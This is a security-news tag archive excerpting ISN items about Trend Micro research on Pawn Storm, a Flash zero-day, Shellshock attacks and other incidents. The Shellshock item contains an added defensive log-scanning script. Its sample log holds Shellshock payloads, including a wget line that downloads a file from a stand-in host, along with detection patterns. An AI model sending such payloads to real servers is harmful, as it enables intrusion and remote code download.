Tag Archives: trend micro

[ISN] Russian cyberspies targeted the MH17 crash investigation

www.networkworld.com/article/2996762/russian-cyberspies-targeted-the-mh17-crash-investigation.html
By Lucian Constantin
IDG News Service
Oct 23, 2015

A Russian cyberespionage group that frequently targets government institutions from NATO member countries tried to infiltrate the international investigation into the crash of Malaysia Airlines Flight 17 (MH17).

MH17 was a passenger flight from Amsterdam to Kuala Lumpur that crashed in eastern Ukraine close to the Russian border on 17 July, 2014. All 283 passengers and 15 crew members lost their lives. The Dutch Safety Board led an international investigation into the incident and released a final report on Oct. 13, concluding that the Boeing 777-200 aircraft was shot down by a warhead launched from a Russian-built Buk missile system.

Security researchers from Trend Micro have found evidence that a cyberespionage group dubbed Pawn Storm, which has long been suspected to have ties to the Russian intelligence services, has targeted the Dutch Safety Board before and after the MH17 report was finalized.

[…]


[ISN] Fake EFF site serving espionage malware was likely active for 3+ weeks

http://arstechnica.com/security/2015/08/fake-eff-site-serving-espionage-malware-was-likely-active-for-3-weeks/
By Dan Goodin
Ars Technica
Aug 28, 2015

A spear-phishing campaign some researchers say is linked to the Russian government masqueraded as the Electronic Frontier Foundation in an attempt to infect targets with malware that collects passwords and other sensitive data.

The targeted e-mails, which link to the fraudulent domain electronicfrontierfoundation.org, appear to be part of a larger campaign known as Pawn Storm. Last October, researchers at security firm Trend Micro brought the campaign to light and said it was targeting US military, embassy, and defense contractor personnel, dissidents of the Russian government, and international media organizations. Last month, Trend Micro said the espionage malware campaign entered a new phase by exploiting what then was a zero-day vulnerability in Oracle’s widely used Java browser plugin. Separate security firm FireEye has said the group behind the attacks has ties to Russia’s government and has been active since at least 2007.

EFF staff technologist Cooper Quintin wrote in a blog post published Thursday that the round of attacks involving the electronicfrontierfoundation.org site may have the ability to infect Mac and Linux machines, as well as the normal Windows fare. On Windows, the campaign downloads a payload known as Sednit that ultimately installs a keylogger and other malicious modules. Its use of the same path names, Java payloads, and Java exploits found in last month’s campaign mean it’s almost certainly the work of the same Pawn Storm actors that struck last month. Quintin wrote:

[…]


[ISN] The tooth gnashing you hear is from Flash users installing a new 0day patch

http://arstechnica.com/security/2015/01/those-teeth-gnashings-you-hear-are-flash-users-installing-a-new-0day-patch/
By Dan Goodin
Ars Technica
Jan 26 2015

Adobe Systems is once again rolling out an emergency Flash update that patches a critical vulnerability under active attack to compromise the computers of unsuspecting users.

The latest Flash versions fix a remote code-execution bug that, as Ars reported last week, recently came under attack in the Angler exploit kit. Malware purveyors and other types of online crooks use such kits to seed compromised websites with attack code. Once people visit the sites with vulnerable computers, the booby-trapped pages surreptitiously exploit the vulnerabilities and install backdoors that can be used to log keystrokes, steal passwords, and install new pieces of malware at will.

An advisory Adobe published late last week warned that the bug resides in versions running on Windows, Macs, and Linux systems. So far, reports suggest that in-the-wild exploits are limited only to Windows systems. The vulnerability stems from a so-called use-after-free bug that allows attackers to corrupt the memory of affected computers. Trend Micro has additional technical details here.

“A critical vulnerability (CVE-2015-0311) exists in Adobe Flash Player 16.0.0.287 and earlier versions for Windows and Macintosh,” the Adobe advisory stated. “Successful exploitation could cause a crash and potentially allow an attacker to take control of the affected system. We are aware of reports that this vulnerability is being actively exploited in the wild via drive-by-download attacks against systems running Internet Explorer and Firefox on Windows 8.1 and below.”

[…]


[ISN] Shellshock DDoS Attacks Spike

http://www.bankinfosecurity.com/shellshock-ddos-attacks-spike-a-7365
By Mathew J. Schwartz
Bank Info Security
September 29, 2014

Distributed-denial-of-service attacks that target the Bash flaws known as Shellshock have spiked in recent days.

“We’re seeing north of 1.5 million #shellshock attacks across the @CloudFlare network daily,” says Matthew Prince, CEO of the content delivery network and DDoS defense firm CloudFlare. Prince says that count is determined by the company’s Web application firewall detecting attempted attacks that use the Shellshock flaw.

Shellshock-targeting DDoS attacks and IRC bots were spotted less than 24 hours after news about the Bash bug went public last week. Since then, security software vendor Trend Micro says it’s also seen Shellshock-related IP address probes directed against unnamed institutions in Brazil, as well as at least one financial services firm in China. “Attackers were trying to see if several IPs owned by the institution were vulnerable to a Shellshock vulnerability, specifically CVE-2014-6271. Further analysis revealed that three of the tested IPs were possibly vulnerable, as the attackers tried to use the command … ‘uname’ [to display] system information, including the OS platform, the machine type, and the processor information.”

To date, however, the security software vendor hasn’t seen the exploit being used to deliver malware payloads. “At first glance, retrieving system information might seem harmless,” Trend Micro says. But this reconnaissance “could possibly be a sign of preparation for … more damaging attacks.”

[…]
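The probes described above work because a vulnerable Bash (CVE-2014-6271) treats any environment variable whose value begins with `() {` as a function definition and keeps executing whatever follows the closing brace; a CGI server that copies HTTP headers into the environment therefore runs the attacker's command. That `() {` prefix is what a WAF or a log search keys on. The following is an added example, not code from the article, CloudFlare or Trend Micro: a POSIX shell script that pulls Shellshock probes out of web-server access-log lines, separates the reconnaissance payloads (the `uname`-style checks Trend Micro observed) from download-and-run payloads, and runs the standard local self-test. The five log lines, the address 198.51.100.7 and the function names are constructed here for illustration.

```shell
#!/bin/sh
# Constructed Apache-style access-log sample (not real traffic). Three of the
# five lines carry a Shellshock probe in the Referer or User-Agent field.
SAMPLE_LOG='10.0.0.5 - - [25/Sep/2014:10:00:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :; }; /usr/bin/uname -a"
10.0.0.6 - - [25/Sep/2014:10:00:02 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.7 - - [25/Sep/2014:10:00:03 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 500 0 "() { :;}; /usr/bin/wget http://198.51.100.7/x -O /tmp/x" "curl/7.30.0"
10.0.0.8 - - [25/Sep/2014:10:00:04 +0000] "GET /cgi-bin/env.cgi HTTP/1.1" 200 12 "-" "() { :;}; /usr/bin/id"
10.0.0.9 - - [25/Sep/2014:10:00:05 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "Mozilla/5.0 (compatible; MSIE 9.0)"'

# Regex for the function-definition prefix every Shellshock probe must carry.
PROBE_RE='\(\)[[:space:]]*\{'

# Print how many lines of the given log text contain a probe.
shellshock_probe_count() {
    printf '%s\n' "$1" | grep -Ec "$PROBE_RE" || true
}

# Print, one per line, the command each probe tries to run after the
# function body. Payloads are assumed not to contain double quotes, which
# is how the sample (and most mass scanners) write them.
shellshock_payloads() {
    printf '%s\n' "$1" \
      | grep -E "$PROBE_RE" \
      | sed -E 's/.*\(\)[[:space:]]*\{[^}]*\};[[:space:]]*//; s/".*$//'
}

# Classify one payload: "recon" for information gathering (the uname-style
# probes the article describes), "dropper" for download-and-run, else "other".
classify_payload() {
    case "$1" in
        *uname*|*whoami*|*bin/id*|*/etc/passwd*) echo recon ;;
        *wget*|*curl*|*fetch*)                   echo dropper ;;
        *)                                       echo other ;;
    esac
}

# One line per probe: "<class>\t<payload>".
shellshock_report() {
    shellshock_payloads "$1" | while IFS= read -r payload; do
        printf '%s\t%s\n' "$(classify_payload "$payload")" "$payload"
    done
}

# Local self-test for CVE-2014-6271: export a crafted function and see whether
# bash executes the trailing command while importing it. Prints "vulnerable",
# "not vulnerable", or "no bash" when no bash binary is on PATH.
bash_vulnerable() {
    command -v bash >/dev/null 2>&1 || { echo "no bash"; return 0; }
    out=$(env x='() { :;}; echo SHELLSHOCK' bash -c 'echo probe' 2>/dev/null)
    case "$out" in
        *SHELLSHOCK*) echo vulnerable ;;
        *)            echo "not vulnerable" ;;
    esac
}

printf 'probes in sample log: %s\n' "$(shellshock_probe_count "$SAMPLE_LOG")"
shellshock_report "$SAMPLE_LOG"
printf 'local bash: %s\n' "$(bash_vulnerable)"
```

On a real server, feed `shellshock_report` the output of `grep cgi-bin /var/log/apache2/access.log`; a burst of `recon` payloads from one source, as in the Trend Micro case, is the signal that a follow-up is being prepared, and the `dropper` class is the one to escalate immediately. The self-test only covers the original bug, so a patched result there does not excuse skipping the vendor update that also fixed the follow-on parser variants.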


[ISN] JPMorgan Had Exodus of Tech Talent Before Hacker Breach

http://www.bloomberg.com/news/2014-09-05/jpmorgan-had-exodus-of-tech-talent-before-hacker-breach.html
By Hugh Son and Michael Riley
Bloomberg.com
Sep 5, 2014

As hackers pierced JPMorgan Chase & Co.’s (JPM) defenses in June, the bank’s cybersecurity chief was just getting acquainted with his employer and its sprawling technology infrastructure.

Greg Rattray, a former U.S. Air Force commander for information warfare, became JPMorgan’s head of information security that month after upheaval at the highest levels of the bank’s tech division. His predecessor, Anthony Belfiore, had resigned early this year to join at least five JPMorgan leaders at First Data Corp. In between, Anish Bhimani was acting security officer while holding at least one other tech role.

“It sucks that this happened at the beginning of Greg’s watch, but this is a legacy issue,” said Tom Kellermann, chief cybersecurity officer at anti-virus software firm Trend Micro Inc. “They had an acting person who was juggling way too much, with no one fully dedicated to the role for a bit of time.”

JPMorgan, led by Chief Executive Officer Jamie Dimon, 58, has rushed to determine the scope of the assault and restore confidence in security at the biggest U.S. lender. While hackers targeted other banks’ systems, JPMorgan is the only bank said to have had gigabytes of data stolen, including information on customer accounts.

[…]


[ISN] Treasury’s New Focus on Cyber-Risks

http://www.bankinfosecurity.com/treasurys-new-focus-on-cyber-risks-a-7068
By Tracy Kitten
Bank Info Security
July 17, 2014

Treasury Secretary Jacob Lew this week took the precedent-setting step of publicly addressing what he referred to as the financial system’s cybersecurity shortcomings. Lew’s comments were noteworthy because they apparently mark the first time a member of the Treasury Department has directly addressed cyber-risks.

Lew’s remarks about the need for banking institutions, retailers and all other parties involved in financial services to make cybersecurity, and cyberthreat information sharing, a top priority could signal a policy shift for the Treasury, says Tom Kellermann, chief cybersecurity officer at Trend Micro. “This is the first time a Secretary of Treasury has made such a declaration,” Kellermann says. “The regulators and bank examiners will now become much more proactive in their roles.”

Point-of-sale attacks against major retailers, including Target Corp., Neiman Marcus and retail crafts store chain Michaels, illustrate why cyberthreat information sharing is needed to adequately protect the country’s critical infrastructure, Lew noted during the Delivering Alpha conference hosted July 17 by cable news station CNBC and global financial magazine Institutional Investor.

[…]


[ISN] Vessel-tracking system vulnerable to denial-of-service, other attacks, researchers say

Forwarded from: security curmudgeon

On Fri, 30 May 2014, InfoSec News wrote:

: http://news.techworld.com/security/3522313/vessel-tracking-system-vulnerable-to-denial-of-service-other-attacks-researchers-say/
:
: By Lucian Constantin
: Techworld.com
: 29 May 2014
:
: Inexpensive equipment can be used to disrupt vessel-tracking systems and
: important communications between ships and port authorities, according
: to two security researchers.
:
: During the Hack in the Box conference in Amsterdam Thursday, Marco
: Balduzzi, a senior research scientist at Trend Micro, and independent
: security researcher Alessandro Pasta described three new attacks against
: the Automatic Identification System (AIS), which is used by over 400,000
: ships worldwide.

Talk about milking a vulnerability… These two disclosed the AIS vulnerabilities October 10, 2013. They are still getting mileage out of it…

[…]


[ISN] Microsoft Word Vulnerability Used Against Taiwanese Government

http://www.techweekeurope.co.uk/news/microsoft-word-vulnerability-used-target-taiwanese-government-145370
By Thomas Brewster
Tech Week Europe
May 13, 2014

A vulnerability in Microsoft Word has been used to target a range of Taiwanese government bodies and an educational institute, a security company has warned.

Whilst a patch was released by Microsoft in its April Patch Tuesday release, attackers continue to use the flaw in the knowledge that organisations would have failed to update their systems.

The first attack spotted by researchers at Trend Micro used an email with a malicious attachment, claiming to have been sent by a government employee offering information on a national poll. The second used similar tactics, but focused on free trade issues, with an attachment containing a title about a work project. Both dropped malware onto the targets’ systems, which was capable of stealing files and persistent surveillance.

The attacks have been tied to a campaign known as Taidoor, which has used zero-day flaws in Internet Explorer to hit high-profile targets in the past.

[…]
